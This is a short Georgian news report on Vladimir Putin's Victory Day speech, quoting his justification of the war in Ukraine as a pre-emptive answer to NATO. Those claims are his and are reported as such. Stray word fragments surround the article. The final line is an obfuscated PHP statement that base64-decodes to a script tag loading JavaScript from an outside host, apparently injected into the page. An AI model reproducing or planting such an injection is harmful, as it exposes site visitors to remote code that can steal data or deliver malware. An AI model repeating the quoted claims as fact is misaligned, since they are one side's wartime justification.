celsiusi
ავერსი საქკაბელი
ფაშიზმზე გამარჯვების დღისადმი მიძღვნილ აღლუმზე სიტყვით გამოსვლისას განაცხადა რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა განაცხადა,  რომ რუსეთის მიერ უკრაინაში წამოწყებული "სამხედრო ოპერაცია", დასავლეთის მხრიდან წამოსულ აგრესიაზე პრევენციულ წინააღმდეგობას წარმოადგენს. 
 
ოკუპანმტი ქვეყნის პრეზიდენტი ამბობს, მოქალაქეებს ფაშიზმზე გამარჯვების დღე მიულოცა და აღნიშნა, რომ ამაყობს გამარჯვებულების დაუძლეველი, ბრწყინვალე თაობით. 
 
"ვამაყობთ გამარჯვებულების დაუძლეველი, ბრწყინვალე თაობით და იმით, რომ მათი შთამომავლები ვართ და ჩვენი მოვალეობა მათი ხსოვნის დაცვაა, ვინც გაანადგურა ნაციზმი, ვინც მემკვიდრეობით გადმოგვცა, რომ უნდა ვიყოთ ფხიზლად და გავაკეთოთ ყველაფერი, რომ გლობალური ომის საშინელება არ განმეორდეს, ამიტომ საერთაშორისო დონეზე არსებული ყველა უთანხმოების მიუხედავად, რუსეთი ყოველთვის თანასწორი და განუყოფელი უსაფრთხოების სისტემის მხარდაჭერით გამოდიოდა; სისტემის, რომელიც სასიცოცხლოდ აუცილებელია მთელი მსოფლიო საზოგადოებისთვის.
 
გასული წლის დეკემბერში ნატოს ქვეყნებს ჩვენ უსაფრთხოების გარანტიების შეთანხმება გაფორმება შევთავაზეთ;, რუსეთი დასავლეთს, ერთმანეთის ინტერესების გათვალისწინებით, სამართლიანი დიალოგისა და გონივრული კომპრომისული გადაწყვეტილების ძიებისკენ მოუწოდებდა. ყველაფერმა უშედეგოდ ჩაიარა, ნატო-ს ქვეყნებმა ჩვენი გაგონება არ მოისურვეს, რაც იმას ნიშნავს, რომ სინამდვილეში, მათ სრულიად სხვა გეგმები ჰქონდათ და ჩვენ ამას ვხედავდით. დონბასში მორიგი სადამსჯელო ოპერაციისთვის მზადება, ჩვენს ისტორიულ მიწებზე შეჭრა, მათ შორის, ყირიმში, ღიად მიმდინარეობდა. კიევში ბირთვული იარაღის შესაძლო შეძენაზე კეთდებოდა განცხადებები. ნატო-მ დაიწყო აქტიური სამხედრო მოცვა ჩვენს სიახლოვეს მდებარე ტერიტორიების, აქედან გამომდინარე, იქმნებოდა ჩვენთვის აბსოლუტურად მიუღებელი საფრთხე, მათ შორის, უშუალოდ ჩვენს საზღვრებთან. ყველაფერი მეტყველებდა იმაზე, რომ შეტაკება ნეო-ნაცისტებთან, ბანდეროველებთან, ვისზეც აშშ-მ და მისმა პარტნიორებმა დადეს ფსონი, გარდაუვალი იქნებოდა. ჩვენ ვხედავდით, როგორ ვითარდებოდა სამხედრო ინფრასტრუქტურა, როგორ დაიწყო მუშაობა ასობით უცხოელმა მრჩეველმა, ნატო-ს ქვეყნებიდან ყველაზე თანამედროვე იარაღის მიწოდება მიმდინარეობდა, საფრთხე ყოველდღიურად იზრდებოდა. რუსეთმა პრევენციული პასუხი გასცა ამ აგრესიას. ეს იყო იძულებითი, დროული და ერთადერთი სწორი გადაწყვეტილება, სუვერენული, ძლიერი, დამოუკიდებელი ქვეყნის მხრიდან“, - განაცხადა რუსეთის პრეზიდენტმა.
831
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");